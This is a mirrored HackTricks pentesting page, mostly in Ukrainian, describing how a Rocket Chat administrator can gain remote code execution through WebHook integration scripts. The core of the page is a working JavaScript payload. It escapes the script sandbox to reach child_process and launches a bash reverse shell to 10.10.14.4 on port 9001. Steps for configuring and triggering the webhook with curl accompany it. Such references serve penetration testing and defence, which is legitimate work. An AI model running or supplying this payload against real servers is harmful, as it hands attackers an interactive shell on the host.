mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-24 21:53:54 +00:00
4.5 KiB
4.5 KiB
Rocket Chat
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
{% embed url="https://websec.nl/" %}
RCE
Якщо ви адміністратор у Rocket Chat, ви можете отримати RCE.
- Перейдіть до
Integrations
і виберітьNew Integration
, а потім виберіть будь-який:Incoming WebHook
абоOutgoing WebHook
. /admin/integrations/incoming
- Згідно з документацією, обидва використовують ES2015 / ECMAScript 6 (в основному JavaScript) для обробки даних. Тож давайте отримати rev shell для javascript як:
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
- Налаштуйте WebHook (канал і пост як ім'я користувача повинні існувати):
- Налаштуйте скрипт WebHook:
- Збережіть зміни
- Отримайте згенеровану URL-адресу WebHook:
- Викличте її за допомогою curl, і ви повинні отримати rev shell
{% embed url="https://websec.nl/" %}
{% hint style="success" %}
Вчіться та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вчіться та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.